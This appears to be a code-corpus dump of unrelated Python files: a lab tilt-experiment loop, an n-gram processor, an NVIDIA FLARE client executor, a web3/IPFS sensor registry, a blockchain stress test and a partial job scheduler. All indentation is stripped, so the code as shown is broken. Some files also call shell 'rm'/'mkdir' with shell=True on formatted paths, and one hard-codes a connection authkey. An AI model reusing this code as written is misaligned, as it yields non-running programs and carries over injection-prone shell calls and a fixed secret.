# tic,clk,starttic,start,starttime,running,stoprunning,startpulse,endtime,counter = initialize()
# loop = traverseSG()
# endgame = loop.run()
# print('Sensors started, waiting for Start pulse from Plexon,\n press Enter to begin Tilts after starting Plexon Recording.')
# while endgame < 2:
# endgame = loop.run()
input('Start Pulse Acquired, Press Enter to begin Tilts')
tilts = choose()
####################################################################################################################################################
#Tilt called here.
for i in range(0,400):
try:
tilter.tilt(i,task,taskinterrupt,tilts,psthclass,client,baseline_recording)
if endgame < 3:
endgame = loop.run()
except KeyboardInterrupt:
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,begin,None,None)
print('\nPausing... (Hit ENTER to contrinue, type quit to exit.)')
try:
response = input()
if response == 'quit':
# endgame = 3
break
print('Resuming...')
except:
pass
continue
except TypeError:
continue
######################################################################################################################################################
# endgame = 3
# try:
# print('Stop Plexon Recording.')
# while endgame < 4:
# endgame = loop.waitforend()
# except KeyboardInterrupt:
# sensors.terminate()
# pass
task.StopTask()
taskinterrupt.StopTask()
sensors.terminate()
print('Done')
|
process.py
|
import subprocess as sp
from os import listdir, linesep
from os.path import isfile, join
from multiprocessing import Queue, Process
import argparse
import string
import collections
import cPickle as pickle
def process(queue, tmp_dir, years):
years_lookup = set(map(str, years))
while not queue.empty():
file = queue.get()
ngram_by_year = {}
onegram_by_year = {}
for year in years:
ngram_by_year[str(year)] = [] # strings of "ngram\t count"
onegram_by_year[str(year)] = collections.Counter() # token: count
print("processing {}".format(file))
out_of_year_count = 0
total_count = 0
with open(file, 'r') as f:
for line in f:
row = line.strip().split("\t")
if (len(row) < 5):
print(line)
continue
filtered = row[0].translate(None, string.punctuation)
filtered = filtered.decode('unicode_escape').encode('ascii','ignore')
ngram = filtered.strip().split(" ")
year = row[1]
total_count += 1
if year not in years_lookup:
out_of_year_count += 1
continue
match_count = row[2]
# update onegrams: this is an approx. but is close
for token in ngram:
onegram_by_year[year][token] += int(match_count)
ngram_by_year[year].append("\t".join([filtered, match_count]))
# print(ngram)
print("total {} ngrams with {} out of year range".format(total_count, out_of_year_count))
out_dir = "{}/{}".format(tmp_dir, file.split('/')[-1])
sp.check_output("mkdir -p {}".format(out_dir), shell=True)
for year in years:
with open(out_dir + "/" + str(year) + "-onegram.pkl", 'w') as f:
pickle.dump(onegram_by_year[str(year)], f)
with open(out_dir + "/" + str(year) + "-ngram.txt", 'w') as f:
f.write(linesep.join(ngram_by_year[str(year)]))
sp.check_output("rm {}".format(file), shell=True)
parser = argparse.ArgumentParser()
parser.add_argument("--num_workers", type=int, default=1)
parser.add_argument("--unzip_dir", type=str, default="data/unzipped_data")
parser.add_argument("--tmp_dir", type=str, default="data/tmp_processed_data")
parser.add_argument("--start", type=int, default=1800)
parser.add_argument("--end", type=int, default=2009)
args = parser.parse_args()
num_files = 800
unzipped_dir = args.unzip_dir
tmp_dir = args.tmp_dir
files = [join(unzipped_dir, f) for f in listdir(unzipped_dir) if isfile(join(unzipped_dir, f))]
assert(len(files) == num_files)
sp.check_output("mkdir -p {}".format(tmp_dir), shell=True)
queue = Queue()
for file in files:
queue.put(file)
workers = []
years = range(args.start, args.end + 1)
for i in range(args.num_workers):
workers.append(Process(target=process, args=(queue, tmp_dir, years)))
for worker in workers:
worker.start()
for worker in workers:
worker.join()
|
client_executor.py
|
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import math
import os
import shlex
import subprocess
import sys
import threading
import time
from multiprocessing.connection import Client
from nvflare.apis.fl_constant import AdminCommandNames, ReturnCode
from nvflare.apis.shareable import Shareable, make_reply
from nvflare.fuel.utils.pipe.file_pipe import FilePipe
from .client_status import ClientStatus, get_status_message
class ClientExecutor(object):
def __init__(self, uid) -> None:
pipe_path = "/tmp/fl/" + uid + "/comm"
if not os.path.exists(pipe_path):
os.makedirs(pipe_path)
self.pipe = FilePipe(root_path=pipe_path, name="training")
self.logger = logging.getLogger(self.__class__.__name__)
def start_train(self, client, args, app_root, app_custom_folder, listen_port):
"""
start_train method to start the FL client training.
:param client: the FL client object.
:param args: admin command arguments for starting the FL client training.
:param app_root: the root folder of the running APP.
:return:
"""
pass
def start_mgpu_train(self, client, args, app_root, gpu_number, app_custom_folder, listen_port):
"""
start the FL client training using multi-GPU.
:param client: the FL client object.
:param args: admin command arguments for starting the FL client training.
:param app_root: the root folder of the running APP.
:param gpu_number: number of GPUs to run FL training
:return:
"""
pass
def check_status(self, client):
"""
check the status of the running client.
:param client: the FL client object.
:return: running FL client status message.
"""
pass
def abort_train(self, client):
"""
To abort the running client.
:param client: the FL client object.
:return: N/A
"""
pass
def abort_task(self, client):
"""
To abort the client executing task.
:param client: the FL client object.
:return: N/A
"""
pass
def get_run_info(self):
"""
To get the run_info from the InfoCollector.
Returns:
"""
pass
def get_errors(self):
"""
To get the error_info from the InfoCollector.
Returns:
"""
pass
def reset_errors(self):
"""
To reset the error_info for the InfoCollector.
Returns:
"""
pass
def send_aux_command(self, shareable: Shareable):
"""
To send the aux command to child process.
Returns:
"""
pass
def cleanup(self):
self.pipe.clear()
class ProcessExecutor(ClientExecutor):
"""
Run the Client executor in a child process.
"""
def __init__(self, uid):
ClientExecutor.__init__(self, uid)
# self.client = client
self.conn_client = None
# self.pool = None
self.listen_port = 6000
self.lock = threading.Lock()
def get_conn_client(self):
if not self.conn_client:
try:
address = ("localhost", self.listen_port)
self.conn_client = Client(address, authkey="client process secret password".encode())
except Exception as e:
pass
def create_pipe(self):
"""Create pipe to communicate between child (training) and main (logic) thread."""
pipe = FilePipe(root_path="/fl/server", name="training")
return pipe
def start_train(self, client, args, app_root, app_custom_folder, listen_port):
# self.pool = multiprocessing.Pool(processes=1)
# result = self.pool.apply_async(_start_client, (client, args, app_root))
# self.conn_client, child_conn = mp.Pipe()
# process = multiprocessing.Process(target=_start_client, args=(client, args, app_root, child_conn, self.pipe))
# # process = multiprocessing.Process(target=_start_new)
# process.start()
self.listen_port = listen_port
new_env = os.environ.copy()
if app_custom_folder != "":
new_env["PYTHONPATH"] = new_env["PYTHONPATH"] + ":" + app_custom_folder
# self.retrieve_cross_validate_setting(client, app_root)
command_options = ""
for t in args.set:
command_options += " " + t
command = (
f"{sys.executable} -m nvflare.private.fed.app.client.worker_process -m "
+ args.workspace
+ " -s fed_client.json "
" --set" + command_options + " print_conf=True"
)
# use os.setsid to create new process group ID
process = subprocess.Popen(shlex.split(command, " "), preexec_fn=os.setsid, env=new_env)
print("training child process ID: {}".format(process.pid))
client.process = process
client.multi_gpu = False
client.status = ClientStatus.STARTED
thread = threading.Thread(
target=self.wait_training_process_finish, args=(client, args, app_root, app_custom_folder)
)
thread.start()
# def retrieve_cross_validate_setting(self, client, app_root):
# if client.config_folder == "":
# client_config = "config_fed_client.json"
# else:
# client_config = client.config_folder + "/config_fed_client.json"
# client_config = os.path.join(app_root, client_config)
# conf = Configurator(
# app_root=app_root,
# cmd_vars={},
# env_config={},
# wf_config_file_name=client_config,
# base_pkgs=[],
# module_names=[],
# )
# conf.configure()
# client.cross_site_validate = conf.wf_config_data.get("cross_validate", False)
# def start_mgpu_train(self, client, args, app_root, gpu_number, app_custom_folder, listen_port):
# self.listen_port = listen_port
#
# new_env = os.environ.copy()
# new_env["PYTHONPATH"] = new_env["PYTHONPATH"] + ":" + app_custom_folder
#
# # self.retrieve_cross_validate_setting(client, app_root)
#
# if client.platform == "PT":
# command = (
# f"{sys.executable} -m torch.distributed.launch --nproc_per_node="
# + str(gpu_number)
# + " --nnodes=1 --node_rank=0 "
# + '--master_addr="localhost" --master_port=1234 '
# + "-m nvflare.private.fed.app.client.worker_process -m "
# + args.workspace
# + " -s fed_client.json "
# " --set secure_train="
# + str(client.secure_train)
# + " print_conf=True use_gpu=True multi_gpu=True uid="
# + client.client_name
# + " config_folder="
# + client.config_folder
# )
# # use os.setsid to create new process group ID
# process = subprocess.Popen(shlex.split(command, " "), preexec_fn=os.setsid, env=new_env)
# else:
# command = (
# "mpirun -np "
# + str(gpu_number)
# + " -H localhost:"
# + str(gpu_number)
# + " -bind-to none -map-by slot -x NCCL_DEBUG=DEBUG -x LD_LIBRARY_PATH -x PATH "
# "-mca pml ob1 -mca btl ^openib --allow-run-as-root "
# f"{sys.executable} -u -m nvmidl.apps.fed_learn.client.worker_process -m "
# + args.workspace
# + " -s fed_client.json --set secure_train="
# + str(client.secure_train)
# + " multi_gpu=true uid="
# + client.client_name
# + " config_folder="
# + client.config_folder
# )
# process = subprocess.Popen(shlex.split(command, " "), env=new_env)
# client.process = process
# client.multi_gpu = True
# # self.pool = multiprocessing.Pool(processes=1)
# # result = self.pool.apply_async(self.call_mpirun, (client, args, app_root))
#
# client.status = ClientStatus.STARTED
# thread = threading.Thread(
# target=self.wait_training_process_finish, args=(client, args, app_root, app_custom_folder)
# )
# thread.start()
def check_status(self, client):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.CHECK_STATUS, "data": {}}
self.conn_client.send(data)
status_message = self.conn_client.recv()
print("check status from process listener......")
return status_message
else:
return get_status_message(client.status)
except:
self.logger.error("Check_status execution exception.")
return "execution exception. Please try again."
def get_run_info(self):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.SHOW_STATS, "data": {}}
self.conn_client.send(data)
run_info = self.conn_client.recv()
return run_info
else:
return {}
except:
self.logger.error("get_run_info() execution exception.")
return {"error": "no info collector. Please try again."}
def get_errors(self):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.SHOW_ERRORS, "data": {}}
self.conn_client.send(data)
errors_info = self.conn_client.recv()
return errors_info
else:
return None
except:
self.logger.error("get_errors() execution exception.")
return None
def reset_errors(self):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.RESET_ERRORS, "data": {}}
self.conn_client.send(data)
except:
self.logger.error("reset_errors() execution exception.")
def send_aux_command(self, shareable: Shareable):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.AUX_COMMAND, "data": shareable}
self.conn_client.send(data)
reply = self.conn_client.recv()
return reply
else:
return make_reply(ReturnCode.EXECUTION_EXCEPTION)
except:
return make_reply(ReturnCode.EXECUTION_EXCEPTION)
def abort_train(self, client):
# if client.status == ClientStatus.CROSS_SITE_VALIDATION:
# # Only aborts cross site validation.
# client.abort()
# elif client.status == ClientStatus.TRAINING_STARTED:
if client.status == ClientStatus.STARTED:
with self.lock:
if client.process:
# if client.platform == 'PT' and client.multi_gpu:
# # kill the sub-process group directly
# os.killpg(os.getpgid(client.process.pid), 9)
# else:
# client.process.terminate()
# kill the sub-process group directly
if self.conn_client:
data = {"command": AdminCommandNames.ABORT, "data": {}}
self.conn_client.send(data)
self.logger.debug("abort sent")
# wait for client to handle abort
time.sleep(2.0)
# kill the sub-process group directly
try:
os.killpg(os.getpgid(client.process.pid), 9)
self.logger.debug("kill signal sent")
except Exception as e:
pass
client.process.terminate()
self.logger.debug("terminated")
# if self.pool:
# self.pool.terminate()
if self.conn_client:
self.conn_client.close()
self.conn_client = None
self.cleanup()
self.logger.info("Client training was terminated.")
def abort_task(self, client):
if client.status == ClientStatus.STARTED:
if self.conn_client:
data = {"command": AdminCommandNames.ABORT_TASK, "data": {}}
self.conn_client.send(data)
self.logger.debug("abort_task sent")
def wait_training_process_finish(self, client, args, app_root, app_custom_folder):
# wait for the listen_command thread to start, and send "start" message to wake up the connection.
start = time.time()
while True:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.START_APP, "data": {}}
self.conn_client.send(data)
break
time.sleep(1.0)
if time.time() - start > 15:
break
self.logger.info("waiting for process to finish")
client.process.wait()
returncode = client.process.returncode
self.logger.info(f"process finished with execution code: {returncode}")
with self.lock:
client.process = None
if self.conn_client:
self.conn_client.close()
self.conn_client = None
# # result.get()
# self.pool.close()
# self.pool.join()
# self.pool.terminate()
# Not to run cross_validation in a new process any more.
client.cross_site_validate = False
client.status = ClientStatus.STOPPED
def close(self):
if self.conn_client:
data = {"command": AdminCommandNames.SHUTDOWN, "data": {}}
self.conn_client.send(data)
self.conn_client = None
self.cleanup()
# class ThreadExecutor(ClientExecutor):
# def __init__(self, client, executor):
# self.client = client
# self.executor = executor
# def start_train(self, client, args, app_root, app_custom_folder, listen_port):
# future = self.executor.submit(lambda p: _start_client(*p), [client, args, app_root])
# def start_mgpu_train(self, client, args, app_root, gpu_number, app_custom_folder, listen_port):
# self.start_train(client, args, app_root)
# def check_status(self, client):
# return get_status_message(self.client.status)
# def abort_train(self, client):
# self.client.train_end = True
# self.client.fitter.train_ctx.ask_to_stop_immediately()
# self.client.fitter.train_ctx.set_prop("early_end", True)
# # self.client.model_manager.close()
# # self.client.status = ClientStatus.TRAINING_STOPPED
# return "Aborting the client..."
def update_client_properties(client, trainer):
# servers = [{t['name']: t['service']} for t in trainer.server_config]
retry_timeout = 30
# if trainer.client_config['retry_timeout']:
# retry_timeout = trainer.client_config['retry_timeout']
client.client_args = trainer.client_config
# client.servers = sorted(servers)[0]
# client.model_manager.federated_meta = {task_name: list() for task_name in tuple(client.servers)}
exclude_vars = trainer.client_config.get("exclude_vars", "dummy")
# client.model_manager.exclude_vars = re.compile(exclude_vars) if exclude_vars else None
# client.model_manager.privacy_policy = trainer.privacy
# client.model_manager.model_reader_writer = trainer.model_reader_writer
# client.model_manager.model_validator = trainer.model_validator
# client.pool = ThreadPool(len(client.servers))
# client.communicator.ssl_args = trainer.client_config
# client.communicator.secure_train = trainer.secure_train
# client.communicator.model_manager = client.model_manager
client.communicator.should_stop = False
client.communicator.retry = int(math.ceil(float(retry_timeout) / 5))
# client.communicator.outbound_filters = trainer.outbound_filters
# client.communicator.inbound_filters = trainer.inbound_filters
client.handlers = trainer.handlers
# client.inbound_filters = trainer.inbound_filters
client.executors = trainer.executors
# client.task_inbound_filters = trainer.task_inbound_filters
# client.task_outbound_filters = trainer.task_outbound_filters
# client.secure_train = trainer.secure_train
client.heartbeat_done = False
# client.fl_ctx = FLContext()
|
__init__.py
|
from os.path import dirname
from ipfsApi import Client as IPFSClient
from base58 import b58decode, b58encode
from easysolc import Solc
import logging
def signWithPassword(keyFilePath, password):
import web3
account = web3.eth.Account()
with open(keyFilePath) as keyfile:
encrypted_key = keyfile.read()
private_key = account.decrypt(encrypted_key, password)
acc = account.privateKeyToAccount(private_key)
def f(trx):
return acc.signTransaction(transaction_dict = trx)
return f
def decodeMultihash(hashStr):
decoded = b58decode(hashStr)
return MultiHash(decoded[0],decoded[1], decoded[2:])
def encodeMultihash(multiHash):
return b58encode(bytes([multiHash.function, multiHash.length]) + multiHash.hashData)
class MultiHash:
def __init__(self, function, length, hashData):
self.function = function
self.length = length
self.hashData = hashData
def __str__(self):
return str(encodeMultihash(self))
def deploy(web3, owner, signCallback):
trx = SensorSource._sensorSourceContract.constructor().buildTransaction({
'nonce' : web3.eth.getTransactionCount(owner),
'from' : owner
})
signedTrx = signCallback(trx)
deployed = web3.eth.waitForTransactionReceipt(
web3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return deployed
class SensorSource:
_contractFile = dirname(__file__) + "/contracts/sensorSource.sol"
_sensorSourceContract = Solc().get_contract_instance(
source = _contractFile,
contract_name = "SensorSource"
)
def __init__(self, web3, ipfs, contractAddress):
self._log = logging.getLogger("SensorSource")
self.__w3 = web3
self.__ipfs = ipfs
self._contract_address = contractAddress
self.__contract = web3.eth.contract(
address = self._contract_address,
abi = self._sensorSourceContract.abi
)
self._log.info("Sensor source @ " + self._contract_address)
self.ipfs_add_str = self.decodeAsMultiHash(self.__ipfs.add_str)
def _trxDict(self, sender):
return {
'nonce' : self.__w3.eth.getTransactionCount(sender),
'from' : sender
}
def decodeAsMultiHash(self, f):
def f_(*args, **kwargs):
return decodeMultihash(f(*args, **kwargs))
return f_
def register(self, sensorId, sensorMetaData, owner, signCallback):
self._log.info("Register sensor " + sensorId)
metaDataHash = self.ipfs_add_str(sensorMetaData)
try:
trx = self.__contract.functions.register_native(
sensorId,
metaDataHash.function,
metaDataHash.length,
metaDataHash.hashData
).buildTransaction(self._trxDict(owner))
signedTrx = signCallback(trx)
result = self.__w3.eth.waitForTransactionReceipt(
self.__w3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return dict(success=True, metaData = metaDataHash, result = result)
except ValueError as e:
return dict(success=False, error = e)
def subscribe(self, sensorId, requestList, subscriber, signCallback):
self._log.info("Subscribe to sensor " + sensorId)
count = len(requestList)
reqListHash = self.ipfs_add_str("\n".join(requestList))
try:
trx = self.__contract.functions.subscribe_native(
sensorId,
reqListHash.function,
reqListHash.length,
reqListHash.hashData,
count
).buildTransaction(self._trxDict(subscriber))
signedTrx = signCallback(trx)
result = self.__w3.eth.waitForTransactionReceipt(
self.__w3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return dict(success=True, result = result)
except ValueError as e:
return dict(success=False, error = e)
def publish(self, sensorId, publicationNumber, publication, signCallback):
self._log.info("Publish as " + sensorId)
publicationHash = self.ipfs_add_str(publication)
try:
trx = self.__contract.functions.publish_native(
sensorId,
publicationHash.function,
publicationHash.length,
publicationHash.hashData,
publicationNumber
).buildTransaction(self._trxDict(sensorId))
signedTrx = signCallback(trx)
result = self.__w3.eth.waitForTransactionReceipt(
self.__w3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return dict(success=True, result = result)
except ValueError as e:
return dict(success=False, error = e)
class SensorSourceEvents:
def __init__(self, w3, contractAddress):
self._log = logging.getLogger("SensorSourceEvents")
self._contract_address = contractAddress
self._contract = w3.eth.contract(address = self._contract_address, abi = SensorSource._sensorSourceContract.abi)
self._log.info("Sensor source @ " + self._contract_address)
self._filters = {
'Registered' : self._contract.events.Registered.createFilter,
'Subscribed': self._contract.events.Subscribed.createFilter,
'Published' : self._contract.events.Published.createFilter
}
def history(self):
return dict(
[
(name, [
(e.args.sensorId, dict(e.args)) for e in f(fromBlock = 0, toBlock = 'latest').get_all_entries()
]) for (name, f) in self._filters.items()
]
)
def listen(self, handlers = {}, timeout = 1):
from multiprocessing import Process
import time
def poll():
filters = dict([(name, f(fromBlock='latest')) for (name, f) in self._filters.items()])
while True:
self._log.debug("Poll events")
for (name, filter) in filters.items():
handler = handlers.get(name)
if(handler):
self._log.debug('Events for ' + name)
for event in filter.get_new_entries():
try:
handler(**dict(event.args))
except Exception as e:
self._log.error('Handler {} failed with args {}:\n{}'.format(handler, str(event.args), e))
time.sleep(timeout)
self._poller = Process(target = poll)
self._poller.start()
class Subscription:
def __init__(self, sensorSource):
pass
class Publisher:
def __init__(self, sensorId):
self.__id = sensorId
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, VACio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, VACio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, VACio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="VACio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission VACio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
scheduler.py
|
"""Contains RAPO scheduler interface."""
import argparse
import datetime as dt
import getpass
import json
import os
import platform
import re
import signal
import subprocess as sp
import sys
import threading as th
import time
import queue
import psutil
from ..database import db
from ..logger import logger
from ..reader import reader
from ..main.control import Control
class Scheduler():
"""Represents application scheduler.
Application scheduler reads configuration from RAPO_CONFIG, schedule
controls as a virtual jobs and run them when it is necessary in separate
threads. Number of execution threads is limited by 5.
Whole scheduling and execution events including errors is being logged
into simple text files placed to logs folder near by main script with
Scheduler instance.
Scheduler timings (current timestamp, delay and waiting) can be seen in
DEBUG mode.
Schedule is being updated each 5 minutes from the beginning of the hour.
Attributes
----------
moment : float or None
Current scheduler moment - internal timestamp.
delay : floar or None
Current scheduler delay - time that is needed to execute internal tasks
including job scheduling and maintenance events.
schedule : dict on None
Dictionary with scheduled jobs where key is a control name and value
is a control configuration presented as another dictionary.
queue : queue.Queue
Queue that consist of jobs that must be executed in FIFO method.
executors : list
List of threads that perform job execution.
server : str or None
Hostname on which this scheduler is running.
username : str or None
OS user that started the scheduler.
pid : int or None
OS PID under which this scheduler is running.
start_date : datetime or None
Date when scheduler was started.
end_date : datetime or None
Date when scheduler was stopped.
status : str or None
Current scheduler status.
"""
def __init__(self):
self.schedule = None
self.moment = None
self.delay = None
self.queue = queue.Queue()
self.executors = []
self.maintenance = th.Event()
self.maintainer = None
self.table = db.tables.scheduler
self.record = reader.read_scheduler_record()
if self.record and self.record['status'] == 'Y':
self.server = self.record['server']
self.username = self.record['username']
self.pid = int(self.record['pid'])
self.start_date = self.record['start_date']
self.stop_date = self.record['stop_date']
self.status = True if self.record['status'] == 'Y' else False
else:
self.server = platform.node()
self.username = getpass.getuser()
self.pid = os.getpid()
self.start_date = None
self.stop_date = None
self.status = False
argv = self._parse_console_arguments()
if argv:
action = argv[0]
if action == 'start':
self.start()
elif action == 'stop':
self.stop()
else:
args = self._parse_arguments()
if args.start is True:
self._start()
elif args.stop is True:
self._stop()
pass
@property
def running(self):
"""Check whether scheduler is running."""
if self.status is True and self.pid and psutil.pid_exists(self.pid):
return True
else:
return False
pass
def start(self):
"""Start scheduler.
When scheduler is started then normally logs should start to generate
(in console/file depending on setup).
RAPO_SCHEDULER will be updated with information about current scheduler
process including server, username, PID, start date and status.
"""
return self._create()
def stop(self):
"""Stop running scheduler.
Process will be stopped.
RAPO_SCHEDULER will be updated with stop date and status.
"""
return self._destroy()
def read(self):
"""Parse schedule from database table into appropriate structure."""
return dict(self._sked())
def _start(self):
if self.running:
message = f'scheduler already running at PID {self.pid}'
raise Exception(message)
logger.info('Starting scheduler...')
self.start_date = dt.datetime.now()
self.status = True
self._start_signal_handlers()
self._start_executors()
self._start_maintainer()
self._enable()
logger.info(f'Scheduler started at PID {self.pid}')
return self._run()
def _run(self):
self._synchronize()
while True:
self._process()
pass
def _stop(self):
if self.status is True:
logger.info('Stopping scheduler...')
self.stop_date = dt.datetime.now()
self.status = False
self._disable()
logger.info(f'Scheduler at PID {self.pid} stopped')
return self._exit()
pass
def _create(self):
exe = sys.executable
file = os.path.abspath(sys.argv[0])
args = '--start'
settings = {}
settings['stdout'] = sp.DEVNULL
settings['stderr'] = sp.DEVNULL
if sys.platform.startswith('win') is True:
settings['creationflags'] = sp.CREATE_NO_WINDOW
command = [exe, file, args]
proc = sp.Popen(command, **settings)
return proc
def _destroy(self):
if self.status is True:
self.stop_date = dt.datetime.now()
self.status = False
self._disable()
return self._terminate()
pass
def _enable(self):
conn = db.connect()
update = self.table.update().values(server=self.server,
username=self.username,
pid=self.pid,
start_date=self.start_date,
stop_date=self.stop_date,
status='Y')
conn.execute(update)
pass
def _disable(self):
conn = db.connect()
update = self.table.update().values(stop_date=self.stop_date,
status='N')
conn.execute(update)
pass
def _exit(self):
return sys.exit()
def _terminate(self):
try:
os.kill(self.pid, signal.SIGTERM)
except OSError:
message = f'scheduler at PID {self.pid} was not found'
raise Warning(message)
pass
def _parse_console_arguments(self):
return [arg for arg in sys.argv[1:] if arg.startswith('-') is False]
def _parse_arguments(self):
parser = argparse.ArgumentParser()
parser.add_argument('--start', action='store_true', required=False)
parser.add_argument('--stop', action='store_true', required=False)
args, anons = parser.parse_known_args()
return args
def _start_signal_handlers(self):
logger.debug('Starting signal handlers...')
signal.signal(signal.SIGINT, lambda signum, frame: self._stop())
signal.signal(signal.SIGTERM, lambda signum, frame: self._stop())
logger.debug('Signal handlers started')
pass
def _start_executors(self):
logger.debug('Starting executors...')
for i in range(5):
name = f'Thread-Executor-{i}'
target = self._execute
thread = th.Thread(name=name, target=target, daemon=True)
thread.start()
self.executors.append(thread)
logger.debug(f'Executor {i} started as {thread.name}')
logger.debug('All executors started')
pass
def _start_maintainer(self):
logger.debug('Starting maintainer...')
name = 'Thread-Maintainer'
target = self._maintain
thread = th.Thread(name=name, target=target, daemon=True)
thread.start()
self.maintainer = thread
logger.debug(f'Maintainer started as {thread.name}...')
pass
def _synchronize(self):
logger.debug('Time will be synchronized')
self.moment = time.time()
logger.debug('Time was synchronized')
pass
def _increment(self):
self.moment += 1
pass
def _process(self):
self._read()
self._walk()
self._complete()
self._next()
pass
def _read(self):
try:
if self.schedule is None or int(self.moment) % 300 == 0:
self.schedule = dict(self._sked())
if self.schedule:
logger.debug(f'Schedule: {self.schedule}')
else:
logger.debug('Schedule is empty')
except Exception:
logger.error()
pass
def _walk(self):
now = time.localtime(self.moment)
for name, record in self.schedule.items():
try:
if (
record['status'] is True
and self._check(record['mday'], now.tm_mday) is True
and self._check(record['wday'], now.tm_wday+1) is True
and self._check(record['hour'], now.tm_hour) is True
and self._check(record['min'], now.tm_min) is True
and self._check(record['sec'], now.tm_sec) is True
):
self._register(name, self.moment)
except Exception:
logger.error()
pass
def _complete(self):
try:
if int(self.moment) % 86400 == 0:
logger.debug('Maintenance triggered')
self.maintenance.set()
except Exception:
logger.error()
pass
def _next(self):
delay = time.time()-self.moment
wait = 1-delay
try:
time.sleep(wait)
except ValueError:
logger.warning('TIME IS BROKEN')
self._synchronize()
else:
logger.debug(f'moment={self.moment}, delay={delay}, wait={wait}')
self._increment()
pass
def _sked(self):
logger.debug('Getting schedule...')
conn = db.connect()
table = db.tables.config
select = table.select()
result = conn.execute(select)
for row in result:
try:
name = row.control_name
status = True if row.status == 'Y' else False
schedule = {} if not row.schedule else json.loads(row.schedule)
record = {k: v for k, v in schedule.items()
if k in ['mday', 'wday', 'hour', 'min', 'sec']}
record['status'] = status
except Exception:
logger.warning()
continue
else:
yield name, record
logger.debug('Schedule retrieved')
pass
def _check(self, unit, now):
# Check if empty or *.
if unit is None or re.match(r'^(\*)$', unit) is not None:
return True
# Check if unit is lonely digit and equals to now.
elif re.match(r'^\d+$', unit) is not None:
unit = int(unit)
return True if now == unit else False
# Check if unit is a cycle and integer division with now is true.
elif re.match(r'^/\d+$', unit) is not None:
unit = int(re.search(r'\d+', unit).group())
if unit == 0:
return False
return True if now % unit == 0 else False
# Check if unit is a range and now is in this range.
elif re.match(r'^\d+-\d+$', unit) is not None:
unit = [int(i) for i in re.findall(r'\d+', unit)]
return True if now in range(unit[0], unit[1] + 1) else False
# Check if unit is a list and now is in this list.
elif re.match(r'^\d+,\s*\d+.*$', unit):
unit = [int(i) for i in re.findall(r'\d+', unit)]
return True if now in unit else False
# All other cases is not for the now.
else:
return False
pass
def _register(self, name, moment):
try:
logger.info(f'Adding control {name}[{moment}] to queue...')
self.queue.put((name, moment))
except Exception:
logger.error()
else:
logger.info(f'Control {name}[{moment}] was added to queue')
pass
def _execute(self):
while True:
if self.queue.empty() is False:
name, moment = self.queue.get()
logger.info(f'Initiating control {name}[{moment}]...')
try:
control = Control(name, timestamp=moment)
control.run()
except Exception:
logger.error()
else:
self.queue.task_done()
logger.info(f'Control {name}[{moment}] performed')
time.sleep(1)
pass
def _maintain(self):
while True:
if self.maintenance.is_set():
logger.info('Starting maintenance')
self._clean()
self.maintenance.clear()
logger.info('Maintenance performed')
break
time.sleep(1)
pass
def _clean(self):
conn = db.connect()
config = db.tables.config
